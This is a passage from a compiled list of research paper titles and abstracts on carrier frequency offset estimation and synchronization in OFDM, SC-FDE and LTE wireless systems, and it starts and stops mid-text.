repetitive training signals is employed. Simulation results demonstrate the relative sensitivity of OFDM/OQAM receivers to the impairments and that the performance loss due to the imperfections can be recovered by the compensation technique. --- paper_title: Inter-carrier interference-free Alamouti-coded OFDM for cooperative systems with frequency offsets in non-selective fading environments paper_content: A modified Alamouti-coded orthogonal frequency division multiplexing (OFDM) scheme is proposed for cooperative systems in non-selective fading environments. Even with the frequency offset between two distributed transmit antennas, the proposed scheme achieves ideal performance and full rate of Alamouti code. By switching subcarriers in the second OFDM symbol of each Alamouti-coded OFDM symbol pair after a simple-phase rotation in the first OFDM symbol, inter-carrier interference terms can be perfectly cancelled after a simple linear combining with the processing overhead of two times down-conversions and discrete Fourier transform (DFT) operations at each OFDM symbol. --- paper_title: Optimal Frequency Offsets with Doppler Spreads in Mobile OFDM System paper_content: In highly mobile OFDM systems, the carrier frequency offsets (CFO) with Doppler spreads for downlink detection can be considerably large, which degrades the frequency alignment for uplink transmission, particularly in employing directional antennas for inter-carrier interference (ICI) reduction. In prior works, the directional antenna was investigated with appropriate frequency alignment in receiver's local oscillator to efficiently reduce ICI in fast time varying OFDM systems. To resolve the optimal frequency offsets problem with Doppler spreads, this paper develops a simple scheme to capture instant Doppler power spectrum density (PSD) through moving directional antennas with arbitrary gain patterns. Thus, the optimal aligning frequency is derived as the center of gravity of the Doppler PSD. Simulations show our approach acquires the highest carrier to interference (C/I) ratio and the lowest bit error rates (BER) compared with other approaches. --- paper_title: Improving Range Accuracy of IEEE 802.15.4a Radios In the Presence of Clock Frequency Offsets paper_content: Two-way time-of-arrival (TW-ToA) is a ranging protocol that provides distance between two devices in absence of synchronization, but it suffers from range estimation errors when clock frequency offset is present. In this work, we provide a timing counter management scheme for TW-ToA that suppresses ranging errors induced by any clock frequency offset between a transmitter and receiver pair. The suggested scheme is shown to be superior both theoretically and empirically to the one that is recommended in the IEEE 802.15.4a standard. --- paper_title: Joint Carrier Frequency Offset and fast time-varying channel estimation for MIMO-OFDM systems paper_content: In this paper, a novel pilot-aided iterative algorithm is developed for MIMO-OFDM systems operating in fast time-varying environment. An L-path channel model with known path delays is considered to jointly estimate the multi-path Rayleigh channel complex gains and Carrier Frequency Offset (CFO). Each complex gain time-variation within one OFDM symbol is approximated by a Basis Expansion Model (BEM) representation. An auto-regressive (AR) model is built for the parameters to be estimated. The algorithm performs recursive estimation using Extended Kalman Filtering. Hence, the channel matrix is easily computed and the data symbol is estimated with free inter-sub-carrier-interference (ICI) when the channel matrix is QR-decomposed. It is shown that only one iteration is sufficient to approach the performance of the ideal case for which the knowledge of the channel response and CFO is available. --- paper_title: An Efficient Blind Estimation of Carrier Frequency Offset in OFDM Systems paper_content: In this paper, we propose a low-complexity blind carrier frequency offset (CFO) estimation scheme for constant modulus (CM)-signaling-based orthogonal frequency-division multiplexing (OFDM) systems. Provided that the channel can be assumed to be slowly time-varying, subcarriers having the same indexes in two consecutive OFDM symbols will experience nearly the same channel effect. This assumption enables us to derive a cost function that is determined by the sum of the products of the signal amplitudes on each pair of equivalent subcarriers from two successive OFDM symbols. The maximization process of this cost function makes it possible to find an appropriate estimate of the CFO. Over frequency-selective Rayleigh fading channels, the proposed CFO estimation method provides improved performance over existing techniques. Moreover, in the context of narrow-band noise and signal gain variations, the simulations demonstrate the robustness and immunity of our scheme. --- paper_title: Training-Based Synchronization and Channel Estimation in AF Two-Way Relaying Networks paper_content: Two-way relaying networks (TWRNs) allow for more bandwidth efficient use of the available spectrum since they allow for simultaneous information exchange between two users with the assistance of an intermediate relay node. However, due to superposition of signals at the relay node, the received signal at the user terminals is affected by multiple impairments, i.e., channel gains, timing offsets, and carrier frequency offsets, that need to be jointly estimated and compensated. This paper presents a training-based system model for amplify-and-forward (AF) TWRNs in the presence of multiple impairments and proposes maximum likelihood and differential evolution based algorithms for joint estimation of these impairments. The Cramer-Rao lower bounds (CRLBs) for the joint estimation of multiple impairments are derived. A minimum mean-square error based receiver is then proposed to compensate the effect of multiple impairments and decode each user's signal. Simulation results show that the performance of the proposed estimators is very close to the derived CRLBs at moderate-to-high signal-to-noise-ratios. It is also shown that the bit-error rate performance of the overall AF TWRN is close to a TWRN that is based on assumption of perfect knowledge of the synchronization parameters. --- paper_title: Sequence Designs for Robust Consistent Frequency-Offset Estimation in OFDM Systems paper_content: In this paper, we derive the average pairwise error probability (PEP) of an integer carrier frequency-offset (CFO) estimator with consistent pilots in orthogonal frequency-division multiplexing (OFDM) systems and address several issues based on PEP analysis. In particular, the relationship between the PEP and consistent pilots is established in terms of a diversity gain and a shift gain. Based on the observations, we present new criteria for sequence designs. Simulation results show that the sequence developed from these criteria yields much reduced outliers compared with conventional sequences for consistent CFO estimation in frequency-selective fading channels. --- paper_title: Efficient Sequential Integer CFO and Sector Identity Detection for LTE Cell Search paper_content: In this letter, we propose an efficient algorithm for the detection of the integer carrier frequency offset (CFO) and sector identity used in the LTE cell search. For the conventional LTE cell search, the integer CFO and sector identity are jointly detected by utilizing the primary synchronization signal (PSS). By exploiting the symmetric property of the PSS, the integer CFO can be solely detected without the knowledge of sector identity, and thus, the joint detection of the integer CFO and sector identity is decoupled. Additionally, the proposed sequential integer CFO and sector identity detection (SISID) removes the effect of the channel frequency responses such that the detection accuracy is enhanced. We also design the SISID hardware architecture where the parts of the signals are processed in the polar coordinate so that all the multiplications are realized by additions/subtractions. The simulation results demonstrate that the proposed SISID achieves better detection accuracy than the conventional methods with only one third of the computational complexity. --- paper_title: Digital Baseband IC Design of OFDM PHY for a 60GHz Proximity Communication System paper_content: This paper presents a digital baseband IC design based on OFDM PHY for a 60GHz proximity communication system. We propose a low computational complexity OFDM demodulator with a carrier frequency offset estimation method in polar coordinates suitable for high-speed parallel architecture. The proposed architecture is implemented in 65nm CMOS technology, and is experimentally verified to achieve the PHY data rate above 2.2Gbps. The digital baseband IC includes a complete functionality of OFDM transceiver with error correcting codecs and MAC. --- paper_title: Performance Improvement of MDPSK Signal Reception in the Presence of Carrier Frequency Offset paper_content: Performance of mobile systems is significantly influenced by the carrier frequency offset caused by a Doppler shift, which leads to deployment of differential modulation schemes instead of coherent detection-based schemes. In this paper, we propose a novel M-ary differential phase-shift keying (MDPSK) receiver that performs better than the receiver with MDPSK differential detection and is very close to the performance of a coherent MDPSK detector. The symbol error probability of the proposed MDPSK receiver is approximately constant within the practical frequency offset range. The proposed receiver may be used in the systems that work in fading and with high-frequency offset environments. --- paper_title: Iterative Sampling Frequency Offset Estimation for MB-OFDM UWB Systems With Long Transmission Packet paper_content: A multiband orthogonal frequency-division multiplexing (MB-OFDM) system, which is one of the effective modulation techniques that have been adopted for high-speed ultrawideband (UWB) systems, is very sensitive to sampling frequency offset (SFO) due to the mismatch between local oscillators at the transmitter and the receiver. In this paper, we propose an iterative SFO estimation method for a high-data-rate MB-OFDM UWB system to improve its SFO estimation accuracy in the case of a long transmission packet. The proposed method is an iterative process of 2-D SFO estimation across pilot subcarriers and consecutive OFDM symbols, together with joint channel estimation. Furthermore, we derive the Cramer-Rao lower bound (CRLB) for the proposed SFO estimation method. This CRLB can be used as a guide for algorithm design and to explore the theoretical limit. Our performance analysis and simulation results show that the proposed iterative SFO estimation method is both practical and effective. --- paper_title: A Blind Fine Synchronization Scheme for SC-FDE Systems paper_content: This work presents a blind fine synchronization scheme, which estimates and compensates residual carrier-frequency offset (RCFO) and symbol timing offset (STO) , for single-carrier frequency-domain equalization (SC-FDE) systems. Existing fine synchronization schemes for SC-FDE systems rely on time-domain unique words (UW) sequences as reference signals to assure the estimation accuracy, at the cost of decreased system throughput. The proposed technique, named simplified weighted least-square method for single-carrier systems (SWLS-SC), combines the decision feedback structure and SWLS estimator for OFDM systems. Together with specifically derived weighting factors, it has much better estimation accuracy than the well-known linear least-square (LLS) method for SC-FDE systems, and its BER performance can approach that of the ideal synchronization condition. The proposed technique is more effective than existing techniques, in terms of both performance and throughput. Theoretical estimation bounds are also derived to verify the effectiveness of the proposed method. --- paper_title: Optimizing Wideband Cyclostationary Spectrum Sensing Under Receiver Impairments paper_content: In the context of Cognitive Radios (CRs), cyclostationary detection of primary users (PUs) is regarded as a common method for spectrum sensing. Cyclostationary detectors rely on the knowledge of the signal's symbol rate, carrier frequency, and modulation class in order to detect the present cyclic features. Cyclic frequency and sampling clock offsets are the two receiver impairments considered in this work. Cyclic frequency offsets, which occur due to oscillator frequency offsets, Doppler shifts, or imperfect knowledge of the cyclic frequencies, result in computing the test statistic at an offset from the true cyclic frequency. In this paper, we analyze the effect of cyclic frequency offsets on conventional cyclostationary detection, and propose a new multi-frame test statistic that reduces the degradation due to cyclic frequency offsets. Due to the multi-frame processing of the proposed statistic, non-coherent integration might occur across frames. Through an optimization framework developed in this work that can be performed offline, we determine the best frame length that maximizes the average detection performance of the proposed cyclostationary detection method given the statistical distributions of the receiver impairments. As a result of the optimization, the proposed detectors is shown to achieve the performance gains over conventional detectors given the constrained sensing time. We derive the proposed detector's theoretical average detection performance, and compare it to the performance of the conventional cyclostationary detector. Our analysis shows that gains in average detection performance using the proposed method can be achieved when the effect of sampling clock offset is less severe than that of the cyclic frequency offset. The analysis given in this paper can be used as a design guideline for practical implementation of cyclostationary spectrum sensors. --- paper_title: Low-complexity pilot-aided compensation for carrier frequency offset and I/Q imbalance paper_content: We propose a novel pilot-aided compensation scheme for carrier frequency offset (CFO) and I/Q imbalance. The proposed scheme comprises a generalized periodic pilot and a low-complexity acquisition algorithm, where the CFO and the coefficients for I/Q imbalance compensation can be obtained in explicit closed-form. --- paper_title: Towards practical channel reciprocity exploitation: Relative calibration in the presence of frequency offset paper_content: Relative calibration has been proposed as a simple way to practically exploit the reciprocity of the wireless channel. It is based on a simple convolutional model for the relationship between the channel impulse responses in both directions, and accounts for the discrepancies between transmit and receive radiofrequency components, without the need for specific calibration hardware. However, the relative calibration methods developed so far have been shown to lack robustness with respect to frequency offset between the devices on both sides of the considered channel. In this article, we introduce a relative calibration algorithm that properly deals with the presence of frequency offset. We verify its robustness and assess its performance through simulations, and validate experimentally the proposed model on measured channels. --- paper_title: Blind Channel Shortening for Asynchronous SC-IFDMA Systems with CFOs paper_content: This paper proposes a blind channel shortening algorithm for uplink reception of a single-carrier interleaved frequency-division multiple-access (SC-IFDMA) system transmitting over a highly-dispersive channel, which is affected by both timing offsets (TOs) and frequency offsets (CFOs). When the length of the cyclic prefix (CP) is insufficient to compensate for channel dispersion and TOs, a common strategy is to shorten the channel by means of time-domain equalization, in order to restore CP properties and ease signal reception. The proposed receiver exhibits a three-stage structure: the first stage performs blind shortening of all the user channel impulse responses (CIRs), by adopting the minimum mean-output energy criterion, without requiring neither a priori knowledge of the CIRs to be shortened, nor preliminary compensation of the CFOs; the second stage performs joint compensation of the CFOs; finally, to alleviate noise amplification effects, possibly arising from CFO compensation, the third stage implements per-user signal-to-noise ratio (SNR) maximization, without requiring knowledge of the shortened CIRs. A theoretical analysis is carried out to assess the effectiveness of the proposed shortening algorithm in the high-SNR regime; moreover, the performances of the overall receiver are validated and compared with those of existing methods by extensive Monte Carlo computer simulations. --- paper_title: Joint Low-Complexity Equalization and Carrier Frequency Offsets Compensation Scheme for MIMO SC-FDMA Systems paper_content: Due to their noise amplification, conventional Zero-Forcing (ZF) equalizers are not suited for interference-limited environments such as the Single-Carrier Frequency Division Multiple Access (SC-FDMA) in the presence of Carrier-Frequency Offsets (CFOs) . Moreover, they suffer increasing complexity with the number of subcarriers and in particular with Multiple-Input Multiple-Output (MIMO) systems. In this letter, we propose a Joint Low-Complexity Regularized ZF (JLRZF) equalizer for MIMO SC-FDMA systems to cope with these problems. The main objective of this equalizer is to avoid the direct matrix inversion by performing it in two steps to reduce the complexity. We add a regularization term in the second step to avoid the noise amplification. From the obtained simulation results, the proposed scheme is able to enhance the system performance with lower complexity and sufficient robustness to estimation errors. --- paper_title: A Scheme to Support Concurrent Transmissions in OFDMA Based Ad Hoc Networks paper_content: In this paper, we propose a novel system architecture to realize OFDMA in ad hoc networks. A partial time synchronization strategy is presented based on the proposed system model. This proposed scheme can support concurrent transmission without global clock synchronization. We also propose a null subcarrier based frequency synchronization scheme to estimate and compensate frequency offsets in a multiple user environment. The simulation results show a good performance of our proposed synchronization scheme in terms of frequency offset estimation error and variance. --- paper_title: Low-Complexity Cell Search With Fast PSS Identification in LTE paper_content: Cell search and synchronization in the Third-Generation Partnership Project (3GPP) Long-Term Evolution (LTE) system is performed in each user equipment (UE) by using the primary synchronization signal (PSS) and secondary synchronization signal (SSS). The overall synchronization performance is heavily dominated by robust PSS detection, which can be achieved in the conventional noncoherent detector by exploiting the essential near-perfect autocorrelation and cross-correlation properties of Zadoff-Chu (ZC) sequences. However, a relatively high computational complexity is observed in conventional algorithms. As compared with them, two new detectors, i.e., almost-half-complexity (AHC) and central-self-correlation (CSC) detectors, are proposed in this paper to achieve reliable PSS detection with much lower complexity by exploiting the central-symmetric property of ZC sequences. The complexity of the proposed CSC detector is only 50% that of the AHC detector, which achieves exactly the same PSS detection accuracy as that of the conventional detector with one half of complexity being saved. An improvement of CSC, i.e., CSCIns, is also proposed in this paper to combat the large-frequency offset. The performance of the CSCIns detector is independent of the frequency offset, and numerical results show that the 90% PSS acquisition time of CSCIns can be well within an 80-ms duration, even in a heavy intercell-interference environment with a signal-to-noise ratio (SNR) of -10 dB. --- paper_title: Iterative Blind OFDM Parameter Estimation and Synchronization for Cognitive Radio Systems paper_content: An iterative design method for Orthogonal Frequency Division Multiplexing (OFDM) system parameter estimation and synchronization under a blind scenario for cognitive radio systems is proposed in this paper. A novel envelope spectrumbased arbitrary oversampling ratio estimator is presented first, based on which the algorithms are then developed to provide the identification of other OFDM parameters (number of subcarriers, cyclic prefix (CP) length). Carrier frequency offset (CFO) and timing offset are estimated for the purpose of synchronization with the help of the identified parameters. An iterative scheme is employed to increase the estimation accuracy. To validate the proposed design, the performance is evaluated under an experimental propagation environment and the results show that the proposed design is capable of adapting blind parameter estimation and synchronization for cognitive radio with improved performances. --- paper_title: Semi-analytic selection of sub-carrier allocation schemes in uplink orthogonal frequency division multiple access paper_content: The authors propose a generalised framework that analytically compares different sub-carrier allocation (SA) or sub-channelisation schemes (such as interleaved SA (ISA), localised SA (LSA) or hybrid schemes) in uplink (UL) orthogonal frequency division multiple access (OFDMA). The ultimate goal of the proposed framework is to systematically determine the best SA scheme among the considered candidates for a given condition of inter-user frequency offsets (IUFOs) and the target bit error rate (BER). As an illustration, two typical SA schemes are considered, that is, ISA and LSA for comparison. First, based on the well-known fact that multiple access interference by IUFO and frequency diversity gain are both dictated by the employed SA scheme, the authors propose a semi-analytic approach to derive coded BER curve formula as a function of frequency offset bound (FOB) for each scheme. Then, the signal-to-noise ratio gain of ISA over LSA for various target BERs and FOBs is derived. Finally, the cutoff FOB over which ISA obtains worse than LSA is obtained and its functional relationship with the target BER is investigated. By following the overall procedure in the proposed framework, the best SA scheme among the various SA candidates for the general UL OFDMA systems with arbitrary system parameters can be chosen. --- paper_title: Iterative Frequency Domain Equalization and Carrier Synchronization for Multi-Resolution Constellations paper_content: Broadband broadcast and multicast wireless systems usually employ OFDM modulations (Orthogonal Frequency Division Multiplexing) combined with non-uniform hierarchical constellations. However, these schemes are very prone to nonlinear distortion effects and have high carrier synchronization requirements. SC-FDE (Single-Carrier with Frequency-Domain Equalization) is an attractive alternative for OFDM, especially when an efficient power amplification is intended. In this paper we consider the use of SC-FDE schemes combined with non-uniform hierarchical constellations in broadband broadcast and multicast wireless systems. We study the impact of residual CFO (Carrier Frequency Offset) on the performance of multi-resolution schemes and we propose iterative frequency domain receivers with joint detection and carrier synchronization to cope with residual CFO estimation errors (a coarse CFO estimation and compensation is assumed before the equalization procedure). Our results show that while a very high carrier synchronization accuracy is required for the least protected bits, the most protected bits are relatively robust to the CFO. By employing the proposed receiver we increase significantly the robustness to residual CFO estimation errors. --- paper_title: Iterative Synchronization-Assisted Detection of OFDM Signals in Cognitive Radio Systems paper_content: Despite many attractive features of an orthogonal frequency-division multiplexing (OFDM) system, the signal detection in an OFDM system over multipath fading channels remains a challenging issue, particularly in a relatively low signal-to-noise ratio (SNR) scenario. This paper presents an iterative synchronization-assisted OFDM signal detection scheme for cognitive radio (CR) applications over multipath channels in low-SNR regions. To detect an OFDM signal, a log-likelihood ratio (LLR) test is employed without additional pilot symbols using a cyclic prefix (CP). Analytical results indicate that the LLR of received samples at a low SNR can be approximated by their log-likelihood (LL) functions, thus allowing us to estimate synchronization parameters for signal detection. The LL function is complex and depends on various parameters, including correlation coefficient, carrier frequency offset (CFO), symbol timing offset, and channel length. Decomposing a synchronization problem into several relatively simple parameter estimation subproblems eliminates a multidimensional grid search. An iterative scheme is also devised to implement a synchronization process. Simulation results confirm the effectiveness of the proposed detector. --- paper_title: Feedback Generation for CoMP Transmission in Unsynchronized Networks with Timing Offset paper_content: Coordinated multipoint (CoMP) transmission is a promising technique in long term evolution (LTE) systems to provide coverage and broadband communication for cell edge user equipments (UEs). However, as signals from multiple transmitters may reach the UE at different times, CoMP networks might experience high time offsets, leading to significant performance loss in closed-loop transmission. In this paper we show that spacing between reference signals (RSs) imposes a phase offset on the transmit covariance matrix in presence of timing offset (TO), affecting the feedback generation. The promised advantages of closed-loop CoMP transmission vanish in presence of TO due to improper precoding matrix index (PMI) selection. Keeping the phase shift close to zero, reliable PMI selection can be guaranteed and as a result near optimum performance is achieved for closed-loop CoMP transmission in unsynchronized networks with TO present. --- paper_title: Analysis of carrier frequency offset estimation with multiple pilot block sequences paper_content: As is well known, dividing the pilot symbols into multiple blocks and separating these blocks at some distances away from each other can significantly improve the frequency estimation accuracy. However, the mean square error (MSE) performance at moderate and low SNR, especially the SNR threshold effect, with multiple pilot block sequences has not been investigated properly. Thus, a numerical calculation method is proposed in this paper to derive the approximate MSE of the ML estimator with multiple pilot block sequences at all SNRs and the proposed calculation method obtains the MSEs coinciding with the simulation results and the calculated approximate MSEs can tell exactly where the SNR thresholds are. --- paper_title: Joint Frequency Synchronization and Spectrum Occupancy Characterization in OFDM-Based Cognitive Radio Systems paper_content: OFDM-based cognitive radio (CR) systems are shown to be an effective solution for increasing spectrum efficiency by activating the certain group of subcarriers (subbands) in locally available spectrum. However, each CR receiver should synchronize itself to appropriate carrier frequency and to identify currently activated subbands. Moreover, energy and bandwidth efficiency of CR systems can be improved if each CR could provide additional characterization of the local spectral content. In this paper a novel joint frequency synchronization and spectrum occupancy characterization method for OFDM-based CR systems is proposed. The synchronization preamble structure is appropriately modified in order to efficiently perform frequency offset estimation, to identify occupied subbands, and, finally, to provide SNR and interference power estimates as reliable quantitative indicators of spectrum occupancy. The performance of proposed method is evaluated for different amounts of spectrum occupancy and interference levels. --- paper_title: An Eigenvalue Based Carrier Frequency Offset Estimator for OFDM Systems paper_content: Orthogonal frequency division multiplexing (OFDM) is sensitive to frequency synchronization errors. This letter proposes a novel data-aided carrier frequency offset (CFO) estimator. We show that the eigenvalues of the inter-carrier interference (ICI) coefficient matrix are the elements of a geometric series distributed on the unit circle of the complex plane. Then, we prove that estimating the CFO is equivalent to finding the eigenvalues of a two-dimensional ICI coefficient matrix. As a result, by transmitting the corresponding eigenvectors, an estimate of the CFO value can be found. In addition to its simplicity, the proposed estimator is proven to be a maximum likelihood estimator. Simulation results are presented to demonstrate the high accuracy of the proposed estimator in presence of channel noise and fading. --- paper_title: An efficient synchronization signal structure for OFDM-based cellular systems paper_content: OFDM has been a widely accepted technology in high rate and multimedia data service systems such as long term evolution (LTE) in the 3rd generation partnership project (3GPP). In this paper, we investigate a synchronization signal structure and corresponding cell search algorithm in the LTE system where two, primary and secondary synchronization signals are employed. We focus on the secondary synchronization signal which possesses two layered scrambling sequences in addition to basic sequences. These scrambling sequences minimize performance degradation in cell search, but incur a high complexity to a mobile station receiver. In this paper, we propose a new secondary synchronization signal structure which does not require additional scrambling sequences while maintaining almost the same performance as the current LTE scheme. We evaluate the performance of the proposed scheme under various channel environments by examining the impacts of multipath fading, frequency offset, and vehicular speed. We also compare the complexity of the proposed scheme with the LTE scheme. --- paper_title: Low-Complexity Iterative Carrier Frequency Offset Estimation with ICI Elimination for OFDM Systems paper_content: In OFDM systems, carrier frequency offset (CFO) between the transmitter and the receiver destroys the orthogonality among subcarriers and induces strong inter-carrier interference (ICI). For the CFO estimation schemes based on frequency-domain pilot signals, the estimation performance is degraded and bounded by the ICI. In this work we propose a novel CFO estimation scheme - PTA-based with ICI elimination (PTA-IE), to improve the CFO estimation performance. By applying an iterative process, the CFO estimation performance can be progressively enhanced, attaining the best achievable performance without ICI. Our proposed scheme can benefit not only the CFO estimation performance but also the demodulation performance on data subcarriers. Moreover, the proposed scheme has low computational complexity without the need of matrix inversion. --- paper_title: Efficient carrier frequency offset estimation for orthogonal frequency-division multiple access uplink with an arbitrary number of subscriber stations paper_content: An efficient method is proposed to estimate the carrier frequency offsets (CFOs) in the orthogonal frequency-division multiple access (OFDMA) uplink. The conventional alternating projection method is accelerated by utilising the inherited properties of the matrices involved. The multiplication of large sparse projection matrices can be elegantly transformed to a series of products involving small dense matrices, and the inverse operation of these large matrices can be substituted by direct computations. Hence, the computational cost is significantly reduced without compromising the accuracy of the CFO estimation. --- paper_title: Signal Design for Reduced Complexity and Accurate Cell Search/Synchronization in OFDM-Based Cellular Systems paper_content: This paper proposes a variant of the frequency-domain synchronization structure specified in the long-term evolution (LTE) standard. In the proposed scheme, the primary synchronization signal used in step-1 cell search is the concatenation of a Zadoff-Chu (ZC) sequence and its conjugate (as opposed to only the ZC sequence in LTE). For step-2 cell search, we propose a complex scrambling sequence requiring no descrambling and a new remapped short secondary synchronization signal that randomizes the intercell interference (as opposed to the first/second scrambling sequence and swapped short signals in LTE). Through a combination of analysis and simulation, we demonstrate that the proposed synchronization signals lead to lower searcher complexity than LTE, a lower detection error rate, a shorter mean cell search time, and immunity toward a frequency offset. --- paper_title: Network-Wide Distributed Carrier Frequency Offsets Estimation and Compensation via Belief Propagation paper_content: In this paper, we propose a fully distributed algorithm for frequency offsets estimation in decentralized systems. With the proposed algorithm, each node estimates its frequency offsets by local computations and limited exchange of information with its direct neighbors. Such algorithm does not require any centralized information processing or knowledge of global network topology. It is shown analytically that the proposed algorithm always converges to the optimal estimates regardless of network topology. Simulation results demonstrate the fast convergence of the algorithm and show that estimation mean-squared-error at each node touches the centralized Cram\'{e}r-Rao bound within a few {iterations of message exchange}. Therefore, the proposed method has low overhead and is scalable with network size. --- paper_title: Implementation and Co-Simulation of Hybrid Pilot-Aided Channel Estimation With Decision Feedback Equalizer for OFDM Systems paper_content: This paper introduces novel hybrid pilot-aided channel estimation with decision feedback equalizer(DFE) for OFDM systems and its corresponding hardware co-simulation platform. This pilot-aided channel estimation algorithm consists of two parts: coarse estimation and fine estimation. In the coarse estimation, the combined classical channel estimation methods including carrier frequency offset (CFO) and channel impulse response (CIR) estimation are used. Based on the received training sequence and pilot tones in the frequency domain, the major CFO, sampling clock frequency offset (SFO) and CIR effect coefficients are derived. In the fine estimation, the pilot-aided polynomial interpolation estimation combined with a new decision feedback equalizer scheme based on minimum mean squared error (MMSE) criteria is proposed to reduce the residual effect caused by imperfect CIR equalizer, SFO and CFO. At the same time, for the purpose of speeding up the whole development and verification process, a new architecture of co-simulation platform which combines software and hardware is introduced. The simulation results on the co-simulation platform indicate that the proposed hybrid channel estimation scheme can enhance the receiver performance by 6 dB in terms of error vector magnitude (EVM) over large ranges of CFO and SFO and BER performance by 7 dB for SNR range over 15 dB. --- paper_title: Blind Timing and Carrier Synchronization in Decode and Forward Cooperative Systems paper_content: Synchronization in Decode and Forward (DF) cooperative communication systems is a complex and challenging task requiring estimation of many independent timing and carrier offsets at each relay in the broadcasting phase and multiple timing and carrier offsets at the destination in the relaying phase. This paper presents a scheme for blind channel, timing and carrier offset estimation in a DF cooperative system with one source, M relays and one destination equipped with N antennas. In particular, we exploit blind source separation at the destination to convert the difficult problem of jointly estimating multiple synchronization parameters in the relaying phase into more tractable sub-problems of estimating many individual timing and carrier offsets for the independent relays. We also modify and propose a criteria for best relay selection at the destination. Simulation results demonstrate the excellent end-to-end Bit Error Rate (BER) performance of the proposed blind scheme with relay selection, which is shown to achieve the maximum diversity order with M = 4 relays using N = 5 antennas at the destination. The presented work is a complete solution to blind synchronization and channel estimation in DF cooperative communication systems. --- paper_title: CRB for Carrier Frequency Offset Estimation with Pilot and Virtual Subcarriers paper_content: The Cramer Rao bound (CRB) for the carrier frequency offset (CFO) estimation with OFDM blocks consisting of virtual, pilot and data subcarriers is derived in this paper. From the CRB derived in the general case that all the three kinds of subcarriers exist, the CRB for the special cases that one or two kinds of the subcarriers are absent can be easily deduced. Further more, the derived CRB is a tight lower bound as well designed estimators, e.g. the maximum likelihood (ML) estimator, can achieve it at high signal to noise ratio (SNR). Thus, the derived CRB is a good benchmark for evaluating many different CFO estimators. --- paper_title: Fine carrier and sampling frequency synchronization in OFDM systems paper_content: This paper investigates the joint pilot-assisted estimation of the residual carrier frequency offset (RCFO) and sampling frequency offset (SFO) in an orthogonal frequency division multiplexing (OFDM) system. As it is known, the exact maximum-likelihood (ML) solution to this problem involves a bidimensional grid-search that cannot be pursued in practice. After introducing an enlarged set of auxiliary unknown parameters, however, the RCFO and SFO recovery tasks can be decoupled and the bidimensional search is thus replaced with a simpler mono-dimensional search. This results into an estimation algorithm of reasonable complexity which is suitable for practical implementation. To further reduce the processing load, we also present an alternative scheme yielding frequency estimates in closed-form. Numerical simulations indicate that the proposed methods outperform existing estimators available in the literature in terms of both estimation accuracy and error-rate performance. --- paper_title: Iterative Decision-Directed Joint Frequency Offset and Channel Estimation for KSP-OFDM paper_content: We propose an iterative decision-directed joint frequency offset (FO) and channel estimation algorithm in a known symbol padding (KSP) orthogonal frequency division multiplexing (OFDM) system, where the guard interval is filled with pilot symbols. Besides those time domain pilot symbols, some additional pilot symbols are transmitted on the pilot carriers. The decision-directed algorithm is initialized by pilot-aided FO estimation without channel knowledge. We propose a possible initialization algorithm that operates in the frequency domain (FD). After the initialization phase, the iterative decision-directed estimation algorithm is applied. For the channel estimation step, an existing pilot-aided channel estimation algorithm is extended to a decision-directed algorithm which uses the Fast Fourier Transform outputs at both the pilot and data carrier positions. For the uncoded case, the proposed iterative decision-directed joint FO and channel estimation algorithm reaches the bit error rate performance of a receiver with perfect synchronization and perfect channel knowledge. For a coded system, there is small loss in performance of less than 1 dB when our proposed algorithm is applied compared to a receiver with perfect knowledge about the FO and the channel. --- paper_title: Spectrum Sensing for OFDM Signals Using Pilot Induced Auto-Correlations paper_content: Orthogonal frequency division multiplex (OFDM) has been widely used in various wireless communications systems. Thus the detection of OFDM signals is of significant importance in cognitive radio and other spectrum sharing systems. A common feature of OFDM in many popular standards is that some pilot subcarriers repeat periodically after certain OFDM blocks. In this paper, sensing methods for OFDM signals are proposed by using such repetition structure of the pilots. Firstly, special properties for the auto-correlation (AC) of the received signals are identified, from which the optimal likelihood ratio test (LRT) is derived. However, this method requires the knowledge of channel information, carrier frequency offset (CFO) and noise power. To make the LRT method practical, we then propose an approximated LRT (ALRT) method that does not rely on the channel information and noise power, thus the CFO is the only remaining obstacle to the ALRT. To handle the problem, we propose a method to estimate the composite CFO and compensate its effect in the AC using multiple taps of ACs of the received signals. Computer simulations have shown that the proposed sensing methods are robust to frequency offset, noise power uncertainty, time delay uncertainty, and frequency selectiveness of the channel. --- paper_title: About the use of different processing domains for synchronization in non-contiguous FBMC systems paper_content: The problem of synchronization in non-contiguous OFDM (NC-OFDM) in the presence of other in-band systems is addressed by means of a comparison between time-and frequency-based signal processing approaches. The filterbank multicarrier scheme with its spectral-efficient offset-QAM (OQAM) OFDM implementation is thereby a good choice for an NC-OFDM system design due to its well-localized spectral signal shape. In this work, we present and discuss two NC-OFDM synchronization methods for OQAM-OFDM, employing the time domain and the already demodulated frequency domain signal for synchronization and evaluate them in terms of sustainable bit-error rate over signal-to-interference ratio and variance of time and frequency offset estimation in different resource allocation scenarios. Additionally, their computational complexity is taken into account to estimate the costs of implementation on hardware. The results show that the task of synchronization can be achieved with comparable performance in both domains with an advantage of frequency domain processing over time domain processing in terms of efficiency in preamble design and complexity. --- paper_title: Single Carrier Modulation With Nonlinear Frequency Domain Equalization: An Idea Whose Time Has Come—Again paper_content: In recent years single carrier modulation (SCM) has again become an interesting and complementary alternative to multicarrier modulations such as orthogonal frequency division multiplexing (OFDM). This has been largely due to the use of nonlinear equalizer structures implemented in part in the frequency domain by means of fast Fourier transforms, bringing the complexity close to that of OFDM. Here a nonlinear equalizer is formed with a linear filter to remove part of intersymbol interference, followed by a canceler of remaining interference by using previous detected data. Moreover, the capacity of SCM is similar to that of OFDM in highly dispersive channels only if a nonlinear equalizer is adopted at the receiver. Indeed, the study of efficient nonlinear frequency domain equalization techniques has further pushed the adoption of SCM in various standards. This tutorial paper aims at providing an overview of nonlinear equalization methods as a key ingredient in receivers of SCM for wideband transmission. We review both hybrid (with filters implemented both in time and frequency domain) and all-frequency-domain iterative structures. Application of nonlinear frequency domain equalizers to a multiple input multiple output scenario is also investigated, with a comparison of two architectures for interference reduction. We also present methods for channel estimation and alternatives for pilot insertion. The impact on SCM transmission of impairments such as phase noise, frequency offset and saturation due to high power amplifiers is also assessed. The comparison among the considered frequency domain equalization techniques is based both on complexity and performance, in terms of bit error rate or throughput. --- paper_title: Pilot Subset Partitioning Based Integer Frequency Offset Estimation for OFDM Systems With Cyclic Delay Diversity paper_content: Cyclic delay diversity (CDD) is a simple transmit diversity technique for coded OFDM systems with multiple transmit antennas. However, high frequency selectivity caused by CDD degrades the performance of post- FFT estimation, i.e., integer frequency offset (IFO). This paper suggests a simple way of improving the performance of the IFO estimator based on the pilot subset partitioning which is designed to reduce the effect of frequency selective fading by adopting the CDD. By partitioning uncorrelated pilot subcarriers into subsets to satisfy high correlation, and performing 